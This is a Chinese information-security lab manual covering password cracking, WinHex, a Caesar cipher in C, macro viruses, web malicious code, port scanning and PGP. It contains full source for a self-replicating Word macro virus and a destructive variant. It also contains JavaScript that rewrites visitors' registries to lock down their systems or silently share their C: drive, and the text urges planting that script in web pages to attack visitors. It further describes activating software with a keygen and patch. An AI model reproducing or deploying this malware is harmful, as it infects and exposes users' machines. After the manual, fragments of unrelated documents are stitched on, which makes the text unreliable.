信息安全与应用---实验指导书

信息安全与应用---实验指导书
信息安全与应用---实验指导书

信息安全与应用

实验指导书

任课教师:周才学

目录

实验1. office口令破解工具aoxppr的使用

实验2. Winhex编辑软件的使用

实验3. 用C语言编程实现凯撒密码

实验4. 嗅探器Ethereal的使用

实验5. Word宏病毒实验

实验6. Web恶意代码实验

实验7. 端口扫描X-scan的使用

实验8. 加密软件pgp的使用

实验一 office口令破解工具aoxppr的使用

实验目的:了解word口令破解的方法,掌握暴力破解和字典破解的原理,具体破解某个word 文档。

实验要求:某个同学设置word口令,长度分别为4,5,6,采用字母数字混合。

实验步骤:

1.安装aoxppr,点setup,一步步安装完成;

2.运行Aoxppr,点击“帮助”,点击“输入注册码”,打开key.txt文件,输入注册码,OK;3.破解类型选项,选暴力破解,字母数字混合,密码长度最大选6;

4.某人制作一个word文档,对其进行加密;

5.另一人对其进行解密,在Aoxppr中输入待解密文件的文件名,点击开始解密。如果该文档没有密码,软件马上就会报告此文档不用解密,4位密码很快就可破译,6位的密码破解时间要长一点,运行过程中,随时可以终止运行。

6.系统破解后,会显示出Office文档的密码。

7.破解过程中可以使用掩码,如密码有8位,以x开始,以99结束,可以设置掩码为"x?????99"

8.用该密码去解密OFFICE文档。

实验二.winhex编辑软件的使用

实验目的:1。利用Winhex查看磁盘文件的十六进制编码;

2。利用Winhex实现文件的简单数学

3.加密变换;利用Winhex恢复被误删除的文件。

实验要求:1人1组,独立完成

实验步骤:

1.在D盘根目录中建立X-ways文件夹,再在这个文件夹中建立case、images、temp等3个文件夹,分别用于保存案例文件、镜像文件和临时文件。运行

winhex,进入系统。

2.根据提示,必须选择“Computer forensics interface(计算机取证)”。

3.完成后进入软件操作界面。

4.在D盘的X-ways中建立一个文本文件x-ways.txt,内容为“练习使用winhex 软件”。在winhex界面中,单击“file”----“open”。

5.将第1,2两个字节改为“D1 A7”,“练习”变为“学习”。

6.保持打开的x-ways.txt文件,单击“Edit”----“modify data”,选择“xor”并输入75,即完成了该文件的加密变换。

7.在winhex中关闭x-ways.txt文件,进入“资源管理器”将该文件删除并清空回收站,此时windows系统无法恢复该文件。下面利用winhex来恢复该文件。

8.单击“case data”窗口中的“file”----“create new case”建立新的分析案例,然后单击“file”----“add medium”添加新的存储介质,此处为D盘。添加后

进入“x-ways”文件夹,可发现被删除的文件已在其中。右击该文件,选择

“Recover/copy”,指定目录文件夹后即可恢复该文件。

实验三. 用C语言编程实现凯撒密码

一、实验目的:

通过编程实现替代密码算法和置换密码算法,加深对古典密码体制的了解,为深入学习

密码学奠定基础。

二、实验内容:

实验参考步骤:

1.新建工程。工程类型选“win32 console application”,输入工程名称,选取工程存储位置,“下一步”,“一个空工程”,完成。

2.选取“FileView”,点“Source Files”,按鼠标右键,选取“添加文件到目录”,输入文件名,点“确定”。

3.开始编程。

4.编译。在“工程“,”设置”,“链接”里,把ws2_32.lib 加入。

5.编译生成可执行文件。

6.运行进行测试,输入数据串和密钥,加密,然后解密。记录下明文和密文。

myCrySubstitude.cpp内容如下:

#include "myCrySubstitude.h"

int Encrypt(unsigned char* str,unsigned char* code)

{

if(str==NULL || code==NULL)

return CRYPT_ERROR;

int str_length = 0;

int i = 0;

while(str[i]!='\0')

{

str_length++;

i++;

}

if(str_length>1024)

{

printf("明文的长度超过1024位");

return CRYPT_ERROR;

}

else if(code[1] != '\0')

{

printf("密钥输入字符不是一位");

return CRYPT_ERROR;

}

if(ToLowerCase(str) != 0)

{

printf("明文字符串转化小写字符出错");

return CRYPT_ERROR;

}

if(ToLowerCase(code) != 0)

{

printf("密钥字符串转化小写字符出错");

return CRYPT_ERROR;

}

int key = code[0]-97;

for(i=0;i

{

str[i]+=key;

if(str[i]>122)

str[i]-=26;

}

return CRYPT_OK;

}

int Decrypt(unsigned char* str,unsigned char* code) {

if(str==NULL || code==NULL)

return DECRYPT_ERROR;

int str_length = 0;

int i = 0;

while(str[i]!='\0')

{

str_length++;

i++;

}

if(str_length>1024)

{

printf("明文的长度超过1024位");

return CRYPT_ERROR;

}

else if(code[1] != '\0')

{

printf("密钥输入字符不是一位");

return CRYPT_ERROR;

}

if(ToLowerCase(str) != 0)

{

printf("明文字符串转化小写字符出错");

return CRYPT_ERROR;

}

if(ToLowerCase(code) != 0)

{

printf("密钥字符串转化小写字符出错");

return CRYPT_ERROR;

}

int key = code[0]-97;

for(i=0;i

{

str[i]-=key;

if(str[i]<97)

str[i]+=26;

}

return CRYPT_OK;

}

int ToLowerCase(unsigned char* str)

{

if(str == NULL)

return 0;

int i = 0;

for(i=0;str[i]!='\0';i++)

{

if(str[i]>64&&str[i]<91)

str[i]+=32;

else if(str[i]>96&&str[i]<123);

else

{

printf("输入了非英文字符");

return 1;

}

}

return 0;

}

实验四.嗅探器Ethereal的使用

参看教材P300页。

实验五.Word宏病毒实验

实验目的:

1.演示宏的编写;2、说明宏的原理及其安全漏洞和缺陷;3、理解宏病毒的作用机制

实验平台:

Windows系列操作系统,Word 2003应用程序

实验步骤:

1.软件设置:关闭杀毒软件;打开Word 2003,在工具→宏→安全性中,将安全级别设置为低,在可靠发行商选项卡中,选择信任任何所有安装的加载项和模板,选择信任visual basic 项目的访问。

注意:为了保证该实验不至于造成较大的破坏性,进行实验感染后,被感染终端不要打开过多的word文档,否则清除比较麻烦(对每个打开过的文档都要清除)。

2.自我复制功能演示。

打开一个word文档,然后按Alt+F11调用宏编写窗口(工具→宏→Visual Basic→宏编辑器),在左侧的project—>Microsoft Word对象→ThisDocument中输入以上代码(参见源代码macro_1.txt),保存,此时当前word文档就含有宏病毒,只要下次打开这个word文档,就会执行以上代码,并将自身复制到Normal.dot(word文档的公共模板)和当前文档的ThisDocument中,同时改变函数名(模板中为Document_Close,当前文档为Document_Open),此时所有的word文档打开和关闭时,都将运行以上的病毒代码,可以加入适当的恶意代码,影响word的正常使用,本例中只是简单的跳出一个提示框。

代码如下:

'Micro-Virus

Sub Document_Open()

On Error Resume Next

Application.DisplayStatusBar = False

Options.SaveNormalPrompt = False

Set ourcodemodule = ThisDocument.VBProject.VBComponents(1).CodeModule

Set host = NormalTemplate.VBProject.VBComponents(1).CodeModule

If ThisDocument = NormalTemplate Then

Set host = ActiveDocument.VBProject.VBComponents(1).CodeModule

End If

With host

If .Lines(1, 1) <> "'Micro-V irus" Then

.DeleteLines 1, .CountOfLines

.InsertLines 1, ourcodemodule.Lines(1, 100)

.ReplaceLine 2, "Sub Document_Close()"

If ThisDocument = NormalTemplate Then

.ReplaceLine 2, "Sub Document_Open()"

ActiveDocument.SaveAs ActiveDocument.FullName

End If

End If

End With

End Sub

代码解释

以上代码的基本执行流程如下:

1)进行必要的自我保护

Application.DisplayStatusBar = False

Options.SaveNormalPrompt = False

高明的病毒编写者其自我保护将做得非常好,可以使word的一些工具栏失效,例如将工具菜单中的宏选项屏蔽,也可以修改注册表达到很好的隐藏效果。

本例中只是屏蔽状态栏,以免显示宏的运行状态,并且修改公用模板时自动保存,不给用户提示。

2)得到当前文档的代码对象和公用模板的代码对象

Set ourcodemodule = ThisDocument.VBProject.VBComponents(1).CodeModule

Set host = NormalTemplate.VBProject.VBComponents(1).CodeModule

If ThisDocument = NormalTemplate Then

Set host = ActiveDocument.VBProject.VBComponents(1).CodeModule

End If

3)检查模板是否已经感染病毒,如果没有,则复制宏病毒代码到模板,并且修改函数名。With Host

If .Lines(1.1) <> "'Micro-V irus" Then

.DeleteLines 1, .CountOfLines

.InsertLines 1, Ourcode

.ReplaceLine 2, "Sub Document_Close()"

If ThisDocument = nomaltemplate Then

.ReplaceLine 2, "Sub Document_Open()"

ActiveDocument.SaveAs ActiveDocument.FullName

End If

End If

End With

4)执行恶意代码

3.具有一定破坏性的宏

我们可以对上例中的恶意代码稍加修改,使其具有一定的破坏性(这里以著名宏病毒“台湾一号”的恶意代码部分为基础,为使其在word2003版本中运行,且降低破坏性,对源代码作适当修改,参见源代码macro_2.txt)。

完整代码如下:

'moonlight

Dim nm(4)

Sub Document_Open()

'DisableInput 1

Set ourcodemodule = ThisDocument.VBProject.VBComponents(1).CodeModule

Set host = NormalTemplate.VBProject.VBComponents(1).CodeModule

If ThisDocument = NormalTemplate Then

Set host = ActiveDocument.VBProject.VBComponents(1).CodeModule

End If

With host

If .Lines(1, 1) <> "'moonlight" Then

.DeleteLines 1, .CountOfLines

.InsertLines 1, ourcodemodule.Lines(1, 100)

.ReplaceLine 3, "Sub Document_Close()"

If ThisDocument = NormalTemplate Then

.ReplaceLine 3, "Sub Document_Open()"

ActiveDocument.SaveAs ActiveDocument.FullName

End If

End If

End With

Count = 0

If Day(Now()) = 1 Then

try:

On Error GoTo try

con = 1

tog$ = ""

i = 0

While test = -1

For i = 0 To 4

nm(i) = Int(Rnd() * 10)

con = con * nm(i)

If i = 4 Then

tog$ = tog$ + Str$(nm(4)) + "=?"

GoTo beg

End If

tog$ = tog$ + Str$(nm(i)) + "*"

Next i

beg:

Beep

ans$ = InputBox$("今天是" + Date$ + ",跟你玩一个心算游戏" + Chr$(13) + "若你答错,只好接受震撼教育......" + Chr$(13) + tog$, "台湾NO.1 Macro V irus")

If R Trim$(LTrim$(ans$)) = L Trim$(Str$(con)) Then

Documents.Add

Selection.Paragraphs.Alignment = wdAlignParagraphCenter

Beep

With Selection.Font

.Name = "细明体"

.Size = 16

.Bold = 1

.Underline = 1

End With

Selection.InsertAfter Text:="何谓宏病毒"

Selection.InsertParagraphAfter

Selection.InsertAfter Text:="答案:"

Selection.Font.Italic = 1

Selection.InsertAfter Text:="我就是......"

Selection.InsertParagraphAfter

Selection.InsertParagraphAfter

Selection.Font.Italic = 0

Beep

Selection.InsertAfter Text:="如何预防宏病毒"

Selection.InsertParagraphAfter

Beep

Selection.InsertAfter Text:="答案:"

Selection.Font.Italic = 1

Selection.InsertAfter Text:="不要看我......"

GoTo out

Else

Count = Count + 1

For j = 1 To 20

Beep

Documents.Add

Next j

Selection.Paragraphs.Alignment = wdAlignParagraphCenter

Selection.InsertAfter Text:="宏病毒"

If Count = 2 Then GoTo out

GoTo try

End If

Wend

End If

out:

End Sub

该病毒的效果如下:当打开被感染的word文档时,首先进行自我复制,感染word模板,然后检查日期,看是否是1日(即在每月的1日会发作),然后跳出一个对话框,要求用户进行一次心算游戏,这里只用四个小于10的数相乘,如果作者的计算正确,那么就会新建一个文档,跳出如下字幕:

何谓宏病毒

答案:我就是......

如何预防宏病毒

答案:不要看我......

如果计算错误,新建20个写有“宏病毒”字样的word文档,然后再一次进行心算游戏,总共进行3次,然后跳出程序。关闭文档的时候也会执行同样的询问。

4.清除宏病毒

对每一个受感染的word文档进行如下操作:

打开受感染的word文档,进入宏编辑环境(Alt+F11),打开Normal→Microsoft Word 对象→This Document,清除其中的病毒代码(只要删除所有内容即可)。

然后打开Project→Microsoft Word→This Document,清除其中的病毒代码。

实际上,模板的病毒代码只要在处理最后一个受感染文件时清除即可,然而清除模板病毒后,如果重新打开其他已感染文件,模板将再次被感染,因此为了保证病毒被清除,可以查看每一个受感染文档的模板,如果存在病毒代码,都进行一次清除。

实验六. Web恶意代码实验

利用网页进行攻击是非常难以防范的,目前尚没有什么特别有效的方法可以防范,如果有,也要以牺牲很多功能作为代价。

所谓恶意网页主要是利用软件或系统操作平台等的安全漏洞,通过执行嵌入在网页H T M L超文本标记语言内的Java Applet小应用程序,JavaScript脚本语言程序,ActiveX控件部件等可自动执行的代码程序,强行修改用户操作系统的注册表设置及系统实用配置程序,或非法控制系统资源盗取用户文件,或恶意删除硬盘文件、格式化硬盘为行为目标的非法恶意程序。

这种非法恶意程序能够得以自动执行,完全在于它不受用户的控制。一旦用户浏览含有该类程序的网页,就会在不知不觉的情况下立马中招,给系统带来不同程度的破坏。

实验目的:

掌握网页恶意代码基本原理。

实验平台:

Windows XP操作系统,IE(Internet Explorer)浏览器

实验步骤:

1.新建Web页面,输入程序源码。

程序源码如下:

用IE打开该文件,观察实验结果,可以看到IE不断的打开163网页。

如果IE阻止了显示内容,右键点击出现的提示信息,选择“允许阻止的内容”,就可以看到实验现象。

2.新建Web页面,编辑程序源码。

程序源码如下:

用IE打开该文件,IE显示的地方出现黑白颜色不断的闪动。

如果IE阻止了显示内容,右键点击出现的提示信息,选择“允许阻止的内容”,就可以看到实验现象。

3.很多人都知道万花谷病毒的厉害,由于其危害之大,很多网站都公布了其源代码。即使不会编程,也能直接拷贝来用。

以下就是这个病毒的代码:

document.write("");

function AddFavLnk(loc,DispName,SiteURL)·201·

{

var Shor=Shl.CreateShortcut(loc+"\\"+DispName+".URL");

Shor.TargetPath=SiteURL;

Shor.Save();

}

function f(){

try

{

ActiveX initialization a1=document.applets[0];

a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");

a1.createInstance();

Shl=a1.GetObject();

a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");

a1.createInstance();

FSO=a1.GetObject();

a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");

a1.createInstance();

Net=a1.GetObject();

Try

{

if(documents.cookies.indexOf("Chg")==-1)

{

//Shl.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page","http:// https://www.360docs.net/doc/2c7868677.html,/");

var expdate=new Date((new Date()).getTime()+(1));

documents.cookies="Chg=general;

expires="+expdate.toGMTString()+";

path=/;

Shl.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentV ersion\\Policies\\Explorer\\ NoRun",

01,"REG_BINARY");//消除“运行”按钮

Shl.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentV ersion\\Policies\\Explorer\\ NoClose",

01,"REG_BINARY");//消除“关闭”按钮

Shl.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentV ersion\\Policies\\Explorer\\ NoLogOff",

01,"REG_BINARY");//消除“注销”按钮

Shl.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentV ersion\\Policies\\Explorer\\ NoDrives",

"63000000","REG_DWORD");//隐藏盘符

Shl.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentV ersion\\Policies\\System\\Di sableRegis-

tryTools","00000001","REG_DWORD");//禁止注册表

Shl.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentV ersion\\Policies\\WinOldAp

p\\Disablecmd",

"00000001","REG_DWORD");//原DOS程序不能用

Shl.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentV ersion\\Policies\\WinOldAp p\\NoRealM-

ode","00000001","REG_DWORD");//设置不能进入DOS方式

Shl.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentV ersion\\Winlogon\\LegalNo ticeCapt-

ion","欢迎来到万花谷!你中了※万花奇毒※.请与OICQ:4040465联系!");//设置开机提示标题·202·

Shl.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentV ersion\\Winlogon\\LegalNo ticeText","

欢迎来到万花谷!你中了※万花奇毒※.请与OICQ:4040465联系!");//设置开机提示内容Shl.RegWrite("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title","欢迎来到万

花谷!你中了※万花奇毒※.请与OICQ:4040465联系!");//设置IE标题

Shl.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title","欢迎来到万

花谷!你中了※万花奇毒※.请与OICQ:4040465联系!");//设置IE标题

var expdate=new Date((new Date()).getTime()+(1));

documents.cookies="Chg=general;

expires="+expdate.toGMTString()+";

path=/;

}

}

catch{}

}

catch{}

}

function init()

{

setTimeout("f()",1000);

}

init();

将以上这段J A V A脚本代码加入到你自己网页的H T M L源代码中,就可以对浏览者实施攻击。当用户点击你的网页时,则会自动执行内嵌在网页内部的上面这段J A V A脚本。

当然如果你对注册表很熟的话,也可以加入其他修改注册表的项,而别人以为只是中了万花谷病毒,用一些专杀工具来查杀,没有想到你还有另外隐藏的一手。

其实,该病毒的感染主要是通过修改注册表来实现的,以下为其设置或修改的注册表项:

●设置“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentV ersion\Policies\Explorer\No Run”为0 1(取消开始菜单上的“运行”项)

●设置“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentV ersion\Policies\Explorer\No Close”为0 1(取消开始菜单上的“关闭”项)

●设置“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentV ersion\Policies\Explorer\No LogOff”为01(取消开始菜单上的“注销”项)

●设置“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentV ersion\Policies\Explorer\No Drives”为63000000(隐藏盘符,你也可以将此项改00000004只隐藏C盘)

●设置“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentV ersion\Policies\System\Disa bleRegistryTools”为00000001(使注册表工具不可用)

●设置“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentV ersion\Policies\WinOldApp\ Disablecmd”为00000000(原DOS程序不可用)

●设置“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentV ersion\Policies\WinOldApp\ NoRealMode”为00000000(不能进入DOS方式)

●设置“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current V ersion\Win

logon\LegalNoticeCaption”为“欢迎来到万花谷!你中了※万花奇毒※.请与OICQ:4040465联系!”(设置登录窗口的标题为“欢迎来到万花谷!你中了※万花奇毒※.请与OICQ:4040465联系!”)

●设置“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentV ersion\Winlog on\LegalNoticeText”为“欢迎来到万花谷!你中了※万花奇毒※.请与OICQ:4040465联系!”(设置登录窗口的内容提示为“欢迎来到万花谷!你中了※万花奇毒※.请与OICQ:4040465联系!”)

●设置“HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main\Window Title”为“欢迎来到万花谷!你中了※万花奇毒※.请与OICQ:4040465联系!”(设置IE窗口的标题为“欢迎来到万花谷!你中了※万花奇毒※.请与OICQ:4040465联系!”)

●修改“HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\Start Page”为“https://www.360docs.net/doc/2c7868677.html,/”(设置IE的首页为https://www.360docs.net/doc/2c7868677.html,)

该病毒不具备自动传染的特性,所以没有点击这种网页的用户不会受到袭击,但是万一某天你自己无意中点击了这种网页怎么办呢?可以采用以下的方法来解决。

①用光盘启动,在DOS环境下找到C:\Windows\Sysbckup目录(此目录是隐藏属性,用Attrib命令去掉其隐藏属性)找到rb004.cab并拷贝出来,在另一台机器上用ZIP解压rb004.cab得到四个文件,把这四个文件复制到C:\Windows下覆盖原文件,用安全模式启动电脑,运行M s c o n f i g,然后在“启动”的标签中找到“H A.h t a”把多选框前面的沟去掉(不过,攻击者在使用中可以改动此病毒的源代码,所以如果发现启动里有可疑的项,都可以去掉前面的勾),再重启动计算机就O K了!

②在DOS下用scanreg/restore注册表,然后再删除启动组中的HA.hta即可。

③另外,我们还可以使用金山毒霸专门针对此病毒出的专杀工具,修改被改病毒破坏的注册表。

对付“万花谷”之类的脚本病毒只要采取切实可行的防范措施,就能将它们拒之门外,因为这些病毒都是通过在网页中使用恶意脚本程序来运行的,我们只要禁止执行这些脚本就可以达到防范于未然的目的。

在控制面板中单击“Internet”,打开“Internet属性”对话框,单击“安全”页面,然后按“自定义级别”按钮进入“安全设置”对话框,将“脚本”选项中的“J a v a小程序脚本”和“活动脚本”都设为“禁用”。这样,以后再上网浏览时就不用担心脚本类病毒了,不过

正常网页中所有通过脚本实现的网页特殊效果也全部被禁用了。

“万花谷”程序代码由作者提供,没有作任何修改,大家可以根据自己对注册表的了解自行修改。本段代码仅供研究、学习使用,不得将本段代码用于非法场合,否则后果自负。

4.通过在网页H T M L源代码加入J a v a S c r i p t脚本,同样可以实现将浏览者的硬盘设置为共享的目的。

script language=JavaScript

document.write("");

function f()

{

a1=document.applets[0];

a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");a1.createInstance();

Shl=a1.GetObject();

Shl.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentV ersion\\Network

\\LanMan\\RWC$\\Flags",302,"REG_DWORD");

Shl.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentV ersion\\Network\\LanMan\\ RWC$\\Type",0,"REG_DWORD");

Shl.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentV ersion\\Network

\\LanMan\\RWC$\\Path","C:\\");

}

function init()

{

setTimeout("f()",1000);

}

init();

/script

以“S h l.R e g W r i t e”开头的这几句代码的作用就是写入浏览者的注册表,在HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentV ersion\Network\LanMan下面添加键值“RWC$”,在“RWC$”下又分别建立键值“Flags”、“Type”、“Path”,如此就将C盘设为共享了,共享名为RWC$。而且计算机用户在网络属性中还看不到硬盘已经被共享!如果把"Flags"=dword:00000302改成"Flags"=dword:00000402,计算机用户将会看到硬

盘被共享。

将上面这段代码加入到你自己网页的H T M L源代码中,上传到网上,当浏览者访问你的网页时,如果I E选项中允许执行代码中的脚本文件(默认),网页中的脚本文件就会对浏览者的注册表进行修改,使其硬盘隐藏共享,其危害较之木马更大。

一旦浏览者中招,我们完全可以把对方的硬盘当做一个逻辑硬盘,可以在对方电脑中随意拷贝文件,删除文件,给文件改名,更有甚者悄悄植入木马,上网账号、Q Q密码、信件……总之,对方的一切都在掌握之下了!

解决办法如下:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentV ersion\Network\LanMan下面的“RWC$”键值删掉。也可以把Windows\system\下面的Vserver.vxd(Microsoft网络上的文件与打印机共享,虚拟设备驱动程序)删掉,再把HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\下的Vserver键值删掉,永绝这类“木马”的后路。

实验七.端口扫描X-scan的使用

实验目的:熟悉黑客攻击的步骤,端口扫描的原理,学会端口扫描软件的使用。

实验要求:要求扫描出局域网中或互联网中某个站点的相关信息。

实验步骤:

该软件不需安装,直接运行;

1菜单中可以选择“中文”或“英文”;

2、点击“设置”,设置“扫描参数”,包括“检测范围”(指定要检测的IP地址范围,

“NETBIOS

“SNMP相关设置”

(点“全选”),可以输入域名),

“扫描模块”(点“全选”),

相关设置”(点“全选”),保存设置;

3、点“开始扫描”;

4、扫描结束后,查看结果。结果中包括开放了哪些端口,系统有哪些弱口令,有哪些

安全漏洞,主机操作系统类型,最后生成一个Web形式的测试报告,对于漏洞还会给出一个解决方案。

实验八.加密软件pgp的使用

实验目的:熟悉对称加密和非对称加密,数字签名等的原理,学会使用pgp加密邮件。

实验要求:2人一组,一人加密邮件,另一人解密。

实验步骤:

1安装PGP软件(需要重新启动系统);

2、运行Keygen,输入用户名和单位名,与安装时同名,点“generate”,生成序列

号,点“Patch”,软件激活成功;

3、运行PGPDeskTop;

信息安全技术实验指导书通信

信息安全技术实验指导书通信 江苏科技大学电子信息学院 2010-3-28

前言 课程名称:网络安全/信息安全技术 适用对象:通信专业/运算机专业 学时学分:1、课时共32学时,2学分,其中实验时数8学时。 2、课时共48学时,3学分,其中实验时数10学时。 在飞速进展的网络时代,专门是电子商务时代,信息安全(专门是网络安全)越来越表现出其重要性,研究和学习信息安全知识,并把握相应主流技术迫在眉睫。信息安全的内容涉及信息安全的差不多理论框架,包括网络安全框架、对称密码技术、公布钥密码技术、HASH 函数、MAC 函数等差不多密码学理论,同时也涉及到更高层的基于密码技术的安全协议分析和应用,也兼顾网络入侵、恶意软件、防火墙等网络安全技术。 信息安全技术作为一门综合性科目,要求学生应具备较全面较扎实的理论基础,课程基础涉及范畴广,课程理论相对比较抽象和纷杂,因而同学们在学习中会有一定难度。为了使理论教学与实践教学紧密结合,注重学生的明白得和动手能力培养,我们安排了信息安全系列实验内容来配合教学环节,期望同学们能认真独立的完成实验内容,增进对课程内容的明白得,提高自己理论联系实际的能力,提高自己独立摸索解决问题的能力。 本实验采纳了一些信息安全方面开放源码的较成熟的软件包和部分商业化并可用于教学目的的软件产品作为试验的差不多平台,这有利于同学们能够充分利用因特网进行更多的试验内容的收集和进一步研究的展开,充分利用网络信息安全相关资源,将更有助于本实验内容的良好完成。 依照教学大纲的要求以及现有实验设备条件,对本课程的实验部分安排了12学时的上机操作,具体分为5次进行,其安排如下: 实验一:密码学算法应用 实验二:网络扫描与侦听 实验三:远程操纵与威逼分析 实验四:PGP软件应用 实验五:操作系统安全配置 实验六:入侵检测 为了让学生能够比较好的完成实验,在做实验前需要做下述预备: 1.实验前的预备工作 ①认真复习理论教学内容及相关资料。 ②认真查询相关实验资料,做好预习预备。 2.实验时应注意的事项

信息安全技术试题答案全面

信息安全技术试题及答案 信息安全网络基础: 一、判断题 1. 信息网络的物理安全要从环境安全和设备安全两个角度来考虑。√ 4. 计算机场地在正常情况下温度保持在 18~28 摄氏度。√ 8. 接地线在穿越墙壁、楼板和地坪时应套钢管或其他非金属的保护套管,钢管应与接地线做电气连通.√ 9. 新添设备时应该先给设备或者部件做上明显标记,最好是明显的无法除去的标记 ,以防更换和方便查找赃物。√ 11. 有很高使用价值或很高机密程度的重要数据应采用加密等方法进行保护。√ 12. 纸介质资料废弃应用碎纸机粉碎或焚毁。√ 容灾与数据备份 一、判断题 2. 数据备份按数据类型划分可以分成系统数据备份和用户数据备份。√ 3. 对目前大量的数据备份来说,磁带是应用得最广的介质。√ 7. 数据越重要,容灾等级越高。√ 8. 容灾项目的实施过程是周而复始的。√ 二、单选题 1. 代表了当灾难发生后,数据的恢复程度的指标是 2. 代表了当灾难发生后,数据的恢复时间的指标是 3. 容灾的目的和实质是 A. 数据备份 B.心理安慰 C. 保持信息系统的业务持续性 D.系统的有益补充 4. 容灾项目实施过程的分析阶段,需要进行 A. 灾难分析 B. 业务环境分析 C. 当前业务状况分析 D. 以上均正确 5. 目前对于大量数据存储来说,容量大、成本低、技术成熟、广泛使用的介质是一一一。 A.磁盘 B. 磁带 c. 光盘 D. 自软盘 6. 下列叙述不属于完全备份机制特点描述的是一一一。 A. 每次备份的数据量较大 B. 每次备份所需的时间也就校长 C. 不能进行得太频繁 D. 需要存储空间小

A. 灾难预测 B.灾难演习 C. 风险分析 D.业务影响分析 8、IBM TSM Fastback 是一款什么软件() A、防病毒产品; B、入侵防护产品; C、上网行为管理产品; D、数据存储备份产品 9、IBM TSM Fastback产品使用的什么技术( ) A、磁盘快照; B、文件拷贝; C、ISCSI技术; D、磁盘共享 12、IBM TSM Fastback产品DR(远程容灾)功能备份的是什么() A、应用系统; B、本地备份的数据; C、文件系统; D、数据库 三、多选题 1. 信息系统的容灾方案通常要考虑的要点有一一。 A. 灾难的类型 B. 恢复时间 C. 恢复程度 D. 实用技术 E 成本 2. 系统数据备份包括的对象有一一一。 A. 配置文件 B.日志文件 C. 用户文档 D.系统设备文件 3. 容灾等级越高,则一一一。 A. 业务恢复时间越短 C. 所需要成本越高 B. 所需人员越多 D. 保护的数据越重 要 4、数据安全备份有几种策略() A、全备份; B、增量备份; C、差异备份; D、手工备份 5、建立Disaster Recovery(容灾系统)的前提是什么()多选 A、自然灾害(地震、火灾,水灾...); B、人为灾害(错误操作、黑客攻击、病毒发作...) C、技术风险(设备失效、软件错误、电力失效...) 6、IBM TSM Fastback 可以支持数据库系统包括()多选 A、M S SQL; B、Oracle; C、DB2; D、MY SQL 7、IBM TSM Fastback 可以支持的存储介质包括() A、磁带介质; B、磁盘介质; C、磁带库; D、磁盘柜 基础安全技术 系统安全 一、判断题 防火墙能帮助阻止计算机病毒和蠕虫进入用户的计算机,但该防火墙不能检测或清除已经感染计算机的病毒和蠕虫√ 8. 数据库管理员拥有数据库的一切权限。√ 9. 完全备份就是对全部数据库数据进行备份。√ 二、单选题 系统的用户帐号有两种基本类型,分别是全局帐号和

网络信息安全技术实验指南

网络信息安全技术实验指导书 江苏科技大学电子信息学院 2010-3-28

前言 课程名称:网络安全/信息安全技术 适用对象:通信专业/计算机专业 学时学分:1、课时共32学时,2学分,其中实验时数8学时。 2、课时共48学时,3学分,其中实验时数10学时。 在飞速发展的网络时代,特别是电子商务时代,信息安全(特别是网络安全)越来越表现出其重要性,研究和学习信息安全知识,并掌握相应主流技术迫在眉睫。信息安全的内容涉及信息安全的基本理论框架,包括网络安全框架、对称密码技术、公开钥密码技术、HASH 函数、MAC 函数等基本密码学理论,同时也涉及到更高层的基于密码技术的安全协议分析和应用,也兼顾网络入侵、恶意软件、防火墙等网络安全技术。 信息安全技术作为一门综合性科目,要求学生应具备较全面较扎实的理论基础,课程基础涉及范围广,课程理论相对比较抽象和繁杂,因而同学们在学习中会有一定难度。为了使理论教学与实践教学紧密结合,注重学生的理解和动手能力培养,我们安排了信息安全系列实验内容来配合教学环节,希望同学们能认真独立的完成实验内容,增进对课程内容的理解,提高自己理论联系实际的能力,提高自己独立思考解决问题的能力。 本实验采用了一些信息安全方面开放源码的较成熟的软件包和部分商业化并可用于教学目的的软件产品作为试验的基本平台,这有利于同学们能够充分利用因特网进行更多的试验内容的收集和进一步研究的展开,充分利用网络信息安全相关资源,将更有助于本实验内容的良好完成。 根据教学大纲的要求以及现有实验设备条件,对本课程的实验部分安排了12学时的上机操作,具体分为5次进行,其安排如下: 实验一:密码学算法应用 实验二:网络扫描与侦听 实验三:远程控制与威胁分析 实验四:PGP软件应用 实验五:操作系统安全配置 实验六:入侵检测 为了让学生能够比较好的完成实验,在做实验前需要做下述准备: 1.实验前的准备工作 ①认真复习理论教学内容及相关资料。 ②认真查询相关实验资料,做好预习准备。 2.实验时应注意的事项

信息安全技术试题答案A

